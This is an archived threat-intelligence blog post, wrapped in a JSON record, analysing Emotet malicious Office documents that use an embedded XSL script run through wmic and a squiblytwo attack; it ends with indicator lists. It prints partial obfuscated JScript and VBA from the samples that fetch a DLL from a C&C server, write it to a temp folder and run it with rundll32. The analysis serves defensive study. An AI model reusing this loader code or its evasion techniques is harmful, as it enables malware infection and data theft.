{
	"id": "2949a79f-b1e0-434a-9e53-4490ef8a3d5d",
	"created_at": "2026-04-06T00:09:42.226422Z",
	"updated_at": "2026-04-10T13:12:35.119841Z",
	"deleted_at": null,
	"sha1_hash": "3f9a47aba3bceb5ea8e807873a694177778e0eaf",
	"title": "You Can Run, But You Can’t Hide: Advanced Emotet Updates",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 115542,
	"plain_text": "You Can Run, But You Can’t Hide: Advanced Emotet Updates\r\nBy Ghanashyam Satpathy\r\nPublished: 2021-01-14 · Archived: 2026-04-05 20:08:30 UTC\r\nCo-authored by Ghanashyam Satpathy and Dagmawi Mulugeta\r\nSummary\r\nEmotet has become one of the world’s most advanced botnets. Like many malware campaigns, Emotet’s primary\r\nmode of delivery is phishing emails that download malicious Microsoft Office documents. Furthermore, these\r\ndocuments are often hosted in popular cloud apps like Office 365 and Amazon S3 to increase the chances of a\r\nsuccessful lure. \r\nAt Netskope, we apply a hybrid approach to malicious Office document detection that leverages a combination of\r\nheuristics and supervised machine learning to identify malicious code embedded in documents. In August –\r\nSeptember of 2020, we identified Emotet samples that use advanced techniques like (1) constructing a PowerShell\r\nscript at runtime, (2) constructing WMI namespaces at runtime, and (3) VBA logic obfuscation to evade static and\r\nsignature-based detections. \r\nOn December 9, 2020, Netskope’s Advanced Threat platform detected downloads of multiple novel Emotet\r\nsamples. These were distributed as Office documents and included additional techniques being used to evade\r\nsignature-based threat detection. These techniques consisted of an Embedded XSL script and a Squiblytwo Attack.\r\nThis blog post describes these attack techniques and lists the IOCs associated with the samples.\r\nAnalysis\r\nEmotet Office document samples are typically Microsoft Excel spreadsheets or Microsoft Word documents that\r\nabuse trusted windows utilities like WMI (Windows Management Instrumentation) to connect to their C\u0026C\r\nservers and download their next stage payloads, which have included TrickBot, QBot, and Ryuk. In this section,\r\nwe explain how two new  Emotet samples we discovered in December 2020 (IOCs provided at the end of this\r\ndocument) use new attack techniques to further evade detection. We will use the code extracted from the sample\r\nb9c0ade410b564f79bd95febaac9f3f4 throughout this post.\r\nThe techniques used in these samples include:\r\nEmbedded XSL script,\r\nSquiblytwo Attack\r\nEmbedded XSL Script\r\nExtensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data\r\nwithin XML files. The new Emotet samples embedded malicious XSL scripts inside the VBA text control\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 1 of 13\n\nproperty. VBA control properties are not usually scanned by AVs as this particular VBA stream (“O” stream) does\r\nnot contain any VBA code. However, these samples store the scripts in control properties before downloading and\r\nexecuting them, as we discuss in the next section. The following screenshot shows the VBA project of one sample.\r\nThe XSL string can be seen inside the control brraQWKmlhxwEUuD (Textbox) text property.\r\nIn the following screenshots, the VBA code extracts the XSL string and saves it to a local file.\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 2 of 13\n\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 3 of 13\n\nThe XSL script contains JScript code which uses the MSXML.HTTP COM object to connect to a live C\u0026C server\r\nas well as the ADODB.STREAM COM object to download a malicious dll payload to local disk. Then,\r\nrundll32.exe’s DllRegisterServer() function is invoked on the downloaded dll, which is primarily a banking trojan\r\nthat steals sensitive information and carries out further infection. Similar to previously seen non-XSL samples,\r\nrecognizable keywords like ADODB.STREAM, SHELL and MSXML2.XMLHTTP.60 are reversed to avoid static\r\ndetection. These relevant sections of the XSL script can be seen highlighted in red below.\r\n\u003c?xml version='1.0'?\u003e\r\n\u003cstylesheet\r\nxmlns=\"https://www.w3.org/1999/XSL/Transform\" xmlns:ms=\"urn:schemas-microsoft-com:xslt\"\r\nxmlns:user=\"placeholder\"\r\nversion=\"1.0\"\u003e\r\n\u003cms:script implements-prefix=\"user\" language=\"JScript\"\u003e\r\n……….\r\n……….\r\n\u003c![CDATA[\r\nvar YYy5U9_3ubzx_jzmWY_kqiaK = [\"m\",\"a\",\"e\",\"r\",\"t\",\"s\",\".\",\"b\",\"d\",\"o\",\"d\",\"a\"].reverse().join(\"\");\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 4 of 13\n\nH1pyKm_1epSOa_w07pV(5070)\r\nfunction dxdNHc_ahxqF(MTdLBC8tVBdkKSLPkhx)\r\n{return new ActiveXObject(MTdLBC8tVBdkKSLPkhx)};\r\n]]\u003e\r\n\u003c/ms:script\u003e\r\n\u003cms:script implements-prefix=\"user\" language=\"JScript\"\u003e\r\n\u003c![CDATA[\r\nvar c31fCXrG0n9yFYU6NOd7nJG = [['hxxps://gpu.utepils.es/v2/lib/ErrorHandler/public/EWbJwE6eMn[.]php\r\n…..\r\n…..]\r\nvar OpD5THUm4wmla = [\"l\",\"l\",\"e\",\"h\",\"s\"].reverse().join(\"\");\r\n]]\u003e\r\n\u003c/ms:script\u003e\r\n…..\r\n…..\r\n\u003cms:script implements-prefix=\"user\" language=\"JScript\"\u003e\r\n\u003c![CDATA[\r\nvar VQJYuHiIaJJ9kKlk3 = [\"0\",\".\",\"6\",\".\",\"p\",\"t\",\"t\",\"h\",\"l\",\"m\",\"x\",\".\",\"2\",\"l\",\"m\",\"x\",\"s\",\"m\"].rev\r\nfunction H8oKu2_2Yjex_3CCppL_aNZqbY()\r\n{return Math.random().toString(36).substr(2, 5);};\r\n]]\u003e\r\n….\r\n….\r\n\u003c![CDATA[\r\nvar UVmJeOaE0Iyvn8twpitsksb = c31fCXrG0n9yFYU6NOd7nJG.length;\r\nfor (var i = 0; i \u003c UVmJeOaE0Iyvn8twpitsksb; i++)\r\ntry{\r\nvar hK3nwLU_tiW2a_PUo0Bd = dxdNHc_ahxqF(VQJYuHiIaJJ9kKlk3);\r\nvar s8kAzF8scysPCEOLx88HvSe = dxdNHc_ahxqF(YYy5U9_3ubzx_jzmWY_kqiaK);\r\nhK3nwLU_tiW2a_PUo0Bd.open(jgDZyVP_0Odx6, c31fCXrG0n9yFYU6NOd7nJG[i][0], 0);\r\nhK3nwLU_tiW2a_PUo0Bd.send();\r\nif (Number(ySGWlFT_qYfuwy_B4wPXN(hK3nwLU_tiW2a_PUo0Bd))== 100+100 \u0026\u0026 Number(RazkK7XzpuMRcXCxayyHMQp\r\nOjJyq8VVHcKCL5QSHL344E(s8kAzF8scysPCEOLx88HvSe);\r\ns8kAzF8scysPCEOLx88HvSe.type = 1;\r\ns8kAzF8scysPCEOLx88HvSe.write(hK3nwLU_tiW2a_PUo0Bd.responsebody);\r\nvar PEA8abizLVE = hK3nwLU_tiW2a_PUo0Bd.getResponseHeader(\"X-User-Agent\")\r\ns8kAzF8scysPCEOLx88HvSe.position = 0;\r\nvar akwmHjYm5cx9J = H8oKu2_2Yjex_3CCppL_aNZqbY().concat([\"l\",\"l\",\"d\",\".\"].reverse().join(\"\"));\r\nvar C36KvCHab5zNzssN8tubsD = \"C:/Windows/Temp/\".concat(\"/\".concat(akwmHjYm5cx9J))\r\ns8kAzF8scysPCEOLx88HvSe[ZnBpmZ0CoKmC(4)](C36KvCHab5zNzssN8tubsD , 2);\r\ns8kAzF8scysPCEOLx88HvSe.close();\r\nn8s5lEFEYxksTagM0tAE0Ht(\"rundll32 \".concat(C36KvCHab5zNzssN8tubsD.concat(\" \".concat(c31fCXrG0n9yFYU6N\r\nbreak;}}\r\ncatch(err){}\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 5 of 13\n\n]]\u003e\u003c/ms:script\u003e\r\n\u003c/stylesheet\u003e\r\nSquiblytwo Attack\r\nThe XSL script is executed using the WMI Command Line Utility (wmic.exe). MITRE refers to this technique of\r\nexecuting XSL as a squiblytwo attack. In addition to this approach, the following are done in order to avoid static\r\ndetection: \r\nThe path to WMI is specified as a moniker string (“winmgmts:root\\cimv2:Win32_Process”) that is\r\nconstructed at runtime,\r\nThe arguments to WMI are not passed during process creation but after creation using the\r\nPostMessageA() API\r\nThe following VBA macro code references an instance of WMI using GetObject() API by passing a moniker\r\nstring.\r\nWith GetObject(M9hKUgW_SlpmT_l2HQu1.MwOtdD8rIIrfYanxWj)\r\nThe following figure shows the function implementation that constructs the moniker string.\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 6 of 13\n\nThe malicious process is created using the Create() method of WMI’s Win32_Process class, as shown below. This\r\ncreation method leaves a minimal identifiable footprint since WMI is now not reported to be a child process of\r\nWINWORD.exe but a child of WMIPrvSe.exe (DCOM process).\r\n.Create kh1iTtZAGmYi45WHVYxTHZ.H8fIVJx9q18b9umN8j, Null, J4aNjfruH3vefzS8A97FcA(gzaVtOS_Wn5xM_dyo50.A8x77U8msgz\r\nThe first argument to Create is “wmIC” which is constructed at runtime as shown below.\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 7 of 13\n\nWMI is passed the following arguments to execute the XSL script.\r\n \"Os geT /FOrMat:\"C:\\Users\\pathto\\F464.XSl\"\r\nThe runtime construction of command line arguments to WMI is shown below.\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 8 of 13\n\nHowever, these arguments are not passed during the creation of WMI but instead sent through Windows API\r\nPostMessageA() call. The VBA macro searches the wmic console via FindWindowExA() using\r\n“consolewindowclass” as an argument before sending the parameters. After this, the arguments are sent to the\r\nwmic console using PostMessageA() method call. \r\nThe Windows API declaration for PostMessageA and FindWindowExA can be seen below.\r\n#If VBA7 Then\r\nPrivate Declare PtrSafe Function Hv0qfxN_12HILY_w7zI8_AIF0mt Lib \"user32.dll\" Alias \"PostMessageA\" (B\r\nPrivate Declare PtrSafe Function Y2WPW1I0fE9mRdbGpOevODYzd Lib \"user32.dll\" Alias \"FindWindowExA\" (By\r\n#Else\r\nPrivate Declare Function Hv0qfxN_12HILY_w7zI8_AIF0mt Lib \"user32.dll\" Alias \"PostMessageA\" (ByVal Rmp\r\nPrivate Declare Function Y2WPW1I0fE9mRdbGpOevODYzd Lib \"user32.dll\" Alias \"FindWindowExA\" (ByVal bckp\r\n#End If\r\nIn the following image, we can see the invocation of PostMessageA() with the arguments to execute the XSL\r\nscript.\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 9 of 13\n\nNetskope Detection\r\nNetskope Advanced Threat Protection provides proactive coverage against zero-day samples of Emotet and\r\nother malicious Office documents using both our ML and heuristic-based static analysis engines as well as our\r\ncloud sandbox. The following screenshot shows the detection for b9c0ade410b564f79bd95febaac9f3f4 ,\r\nindicating it was detected by both Netskope AV and the Netskope Advanced Heuristic Engine. The indicators\r\nsection shows the reasons it was detected as malicious: the sample auto executes the macro code described in this\r\nblog post, writes files to the system, as well as executes system APIs.\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 10 of 13\n\nConclusion\r\nIn addition to the techniques covered in our previous blog posts, the Emotet samples above use two new advanced\r\ntechniques to evade signature-based detection. Netskope Advanced Threat Protection includes a custom Microsoft\r\nOffice file analyzer and a sandbox to detect campaigns like Emotet that are in active development and are\r\nspreading using new Office documents. We will continue to provide updates on this threat as it evolves.\r\nIOCs\r\nSample 1: b9c0ade410b564f79bd95febaac9f3f4\r\nDropped executable file (DLL name is randomly generated)\r\nC:/Windows/Temp//m3zt1.dll\r\nDNS requests\r\ndomain gpu.utepils[.]es\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 11 of 13\n\ndomain hub.2mind.com[.]br\r\ndomain swarajcollegeofeducation[.]com\r\ndomain buy.manairge[.]com\r\ndomain sniezka-6.test.etriton[.]pl\r\ndomain www.alfenory[.]net\r\nConnections  \r\nip 23.55.163[.]71\r\nip 91.121.76[.]43\r\nip 103.235.106[.]140\r\nip 178.254.36[.]172\r\nip 23.55.163[.]68\r\nip 167.172.218[.]142\r\nip 185.41.131[.]131\r\nip 47.244.28[.]71\r\nHTTP requests\r\nurl hxxp://sniezka-6.test.etriton[.]pl/wp-includes/js/jquery/ui/Cs3xTXhrij[.]php\r\nurl hxxp://www.alfenory[.]net/alfenory_erp.de/frontaccounting/purchasing/allocations/REbrGXIrn5Ewu5[.]php \r\nSample 2: 58b416ddb58188c5d726e25b62bd4162 \r\nDropped executable file (DLL name is random generated)\r\nC:/Windows/Temp//j3vg1.dll\r\nDNS requests\r\ndomain babor-kosmetik-steglitz[.]de\r\ndomain sniezka-6.test.etriton[.]pl\r\ndomain hub.2mind.com[.]br\r\ndomain gpu.utepils[.]es\r\ndomain swarajcollegeofeducation[.]com\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 12 of 13\n\ndomain www.alfenory[.]net\r\ndomain dna.1key[.]win\r\nConnections\r\nip 185.41.131[.]131\r\nip 91.121.76[.]43\r\nip 2.16.107[.]80\r\nip 178.254.36[.]172\r\nip 103.235.106[.]140\r\nip 167.172.218[.]142\r\nip 2.16.107[.]114\r\nip 222.232.172[.]143\r\nHTTP requests\r\nurl hxxp://sniezka-6.test.etriton[.]pl/wp-includes/js/jquery/ui/Cs3xTXhrij[.]php\r\nurl hxxp://www.alfenory[.]net/alfenory_erp.de/frontaccounting/purchasing/allocations/tLWENYfjYFd[.]php\r\nurl hxxp://swarajcollegeofeducation[.]com/a4content/a4progallery/nt5asQtUwL[.]php\r\nurl hxxp://dna.1key[.]win/mysql/locale/pt_BR/LC_MESSAGES/ieBUxi2PXfapVpE[.]php\r\nThank you to Zhi Xu and Benjamin Chang  for helping analyze the sample files and contributing to this blog.\r\nSource: https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nhttps://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates"
	],
	"report_names": [
		"you-can-run-but-you-cant-hide-advanced-emotet-updates"
	],
	"threat_actors": [],
	"ts_created_at": 1775434182,
	"ts_updated_at": 1775826755,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3f9a47aba3bceb5ea8e807873a694177778e0eaf.pdf",
		"text": "https://archive.orkl.eu/3f9a47aba3bceb5ea8e807873a694177778e0eaf.txt",
		"img": "https://archive.orkl.eu/3f9a47aba3bceb5ea8e807873a694177778e0eaf.jpg"
	}
}